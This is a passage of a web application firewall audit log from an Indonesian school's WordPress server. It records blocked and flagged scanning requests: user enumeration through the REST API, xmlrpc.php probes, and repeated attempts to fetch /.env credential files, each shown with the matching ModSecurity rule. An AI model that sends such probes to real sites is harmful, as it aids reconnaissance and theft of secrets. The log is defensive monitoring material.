charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f217e80a-C-- demo.sayHello --f217e80a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f217e80a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341033870317 4594 (- - -) Stopwatch2: 1746341033870317 4594; combined=3601, p1=410, p2=2996, p3=24, p4=25, p5=86, sr=64, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f217e80a-Z-- --f8b28076-A-- [04/May/2025:13:45:13 +0700] aBcM-dsVQyl9V2B8Pt-9YQAAAFg 103.236.140.4 50552 103.236.140.4 8181 --f8b28076-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f8b28076-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8b28076-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746341113705291 2848 (- - -) Stopwatch2: 1746341113705291 2848; combined=1243, p1=433, p2=780, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8b28076-Z-- --cf618a39-A-- [04/May/2025:13:45:18 +0700] aBcM_mJEE9ao5dcyYWnxLwAAAIA 103.236.140.4 50560 103.236.140.4 8181 --cf618a39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cf618a39-C-- demo.sayHello --cf618a39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf618a39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746341118453129 5766 (- - -) Stopwatch2: 1746341118453129 5766; combined=4273, p1=570, p2=3498, p3=32, p4=31, p5=84, sr=116, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf618a39-Z-- --36d2e003-A-- [04/May/2025:14:55:31 +0700] aBcdc_nZiHJYHUAF8QfhJAAAAAU 103.236.140.4 51750 103.236.140.4 8181 --36d2e003-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36d2e003-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36d2e003-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746345331618881 3208 (- - -) Stopwatch2: 1746345331618881 3208; combined=1429, p1=490, p2=907, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36d2e003-Z-- --02146452-A-- [04/May/2025:14:55:34 +0700] aBcddvnZiHJYHUAF8QfhJQAAAAc 103.236.140.4 51754 103.236.140.4 8181 --02146452-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02146452-C-- demo.sayHello --02146452-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02146452-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746345334431616 5395 (- - -) Stopwatch2: 1746345334431616 5395; combined=4080, p1=522, p2=3345, p3=29, p4=33, p5=90, sr=74, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02146452-Z-- --6276d23f-A-- [04/May/2025:14:56:26 +0700] aBcdqvnZiHJYHUAF8QfhJwAAAAQ 103.236.140.4 51758 103.236.140.4 8181 --6276d23f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6276d23f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6276d23f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746345386639443 3224 (- - -) Stopwatch2: 1746345386639443 3224; combined=1333, p1=488, p2=810, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6276d23f-Z-- --c0003d76-A-- [04/May/2025:14:56:29 +0700] aBcdrfnZiHJYHUAF8QfhKQAAAAk 103.236.140.4 51762 103.236.140.4 8181 --c0003d76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0003d76-C-- demo.sayHello --c0003d76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0003d76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746345389965681 4817 (- - -) Stopwatch2: 1746345389965681 4817; combined=3654, p1=427, p2=3023, p3=22, p4=25, p5=91, sr=64, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0003d76-Z-- --87737b50-A-- [04/May/2025:15:30:44 +0700] aBcltPnZiHJYHUAF8QfjpAAAAAY 103.236.140.4 57152 103.236.140.4 8181 --87737b50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87737b50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87737b50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746347444980082 3005 (- - -) Stopwatch2: 1746347444980082 3005; combined=1359, p1=469, p2=861, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87737b50-Z-- --d235ff23-A-- [04/May/2025:15:30:52 +0700] aBclvPnZiHJYHUAF8QfjpQAAAAI 103.236.140.4 57156 103.236.140.4 8181 --d235ff23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d235ff23-C-- demo.sayHello --d235ff23-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d235ff23-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746347452042656 5384 (- - -) Stopwatch2: 1746347452042656 5384; combined=4078, p1=503, p2=3360, p3=29, p4=32, p5=92, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d235ff23-Z-- --0bb69f61-A-- [04/May/2025:15:41:21 +0700] aBcoMfnZiHJYHUAF8Qfj5wAAAAs 103.236.140.4 57732 103.236.140.4 8181 --0bb69f61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0bb69f61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb69f61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746348081496618 2919 (- - -) Stopwatch2: 1746348081496618 2919; combined=1312, p1=447, p2=832, p3=0, p4=0, p5=32, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb69f61-Z-- --d10a164c-A-- [04/May/2025:15:41:28 +0700] aBcoOGJEE9ao5dcyYWn1XwAAAI4 103.236.140.4 57736 103.236.140.4 8181 --d10a164c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d10a164c-C-- demo.sayHello --d10a164c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d10a164c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746348088276352 5927 (- - -) Stopwatch2: 1746348088276352 5927; combined=4302, p1=558, p2=3533, p3=31, p4=35, p5=86, sr=79, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d10a164c-Z-- --7a867663-A-- [04/May/2025:15:45:08 +0700] aBcpFPnZiHJYHUAF8Qfj6AAAABA 103.236.140.4 58208 103.236.140.4 8181 --7a867663-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Wget/1.12 (freebsd8.1) Accept-Charset: utf-8 --7a867663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a867663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746348308418286 831 (- - -) Stopwatch2: 1746348308418286 831; combined=331, p1=289, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a867663-Z-- --4903a258-A-- [04/May/2025:15:46:27 +0700] aBcpY_nZiHJYHUAF8Qfj6wAAABc 103.236.140.4 58242 103.236.140.4 8181 --4903a258-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4903a258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4903a258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746348387507467 1998 (- - -) Stopwatch2: 1746348387507467 1998; combined=942, p1=316, p2=598, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4903a258-Z-- --0c7dac10-A-- [04/May/2025:15:46:32 +0700] aBcpaGJEE9ao5dcyYWn2UwAAAJc 103.236.140.4 58266 103.236.140.4 8181 --0c7dac10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c7dac10-C-- demo.sayHello --0c7dac10-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7dac10-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746348392160854 4592 (- - -) Stopwatch2: 1746348392160854 4592; combined=3621, p1=466, p2=2954, p3=23, p4=24, p5=90, sr=67, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7dac10-Z-- --9627311e-A-- [04/May/2025:16:27:49 +0700] aBczFWJEE9ao5dcyYWn3PgAAAIY 103.236.140.4 59126 103.236.140.4 8181 --9627311e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9627311e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9627311e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746350869498212 3284 (- - -) Stopwatch2: 1746350869498212 3284; combined=1417, p1=460, p2=925, p3=0, p4=0, p5=31, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9627311e-Z-- --fd413139-A-- [04/May/2025:16:27:56 +0700] aBczHGJEE9ao5dcyYWn3QAAAAJg 103.236.140.4 59130 103.236.140.4 8181 --fd413139-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd413139-C-- demo.sayHello --fd413139-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd413139-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746350876272572 5560 (- - -) Stopwatch2: 1746350876272572 5560; combined=4342, p1=464, p2=3642, p3=39, p4=42, p5=91, sr=70, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd413139-Z-- --b68c9554-A-- [04/May/2025:16:36:15 +0700] aBc1D2JEE9ao5dcyYWn3RAAAAI4 103.236.140.4 59172 103.236.140.4 8181 --b68c9554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Safari/537.36 Accept-Charset: utf-8 --b68c9554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b68c9554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746351375991635 874 (- - -) Stopwatch2: 1746351375991635 874; combined=324, p1=289, p2=0, p3=0, p4=0, p5=34, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b68c9554-Z-- --acbd083e-A-- [04/May/2025:16:38:24 +0700] aBc1kPnZiHJYHUAF8QfkEQAAAA0 103.236.140.4 59192 103.236.140.4 8181 --acbd083e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.212.77 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.212.77 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --acbd083e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acbd083e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] 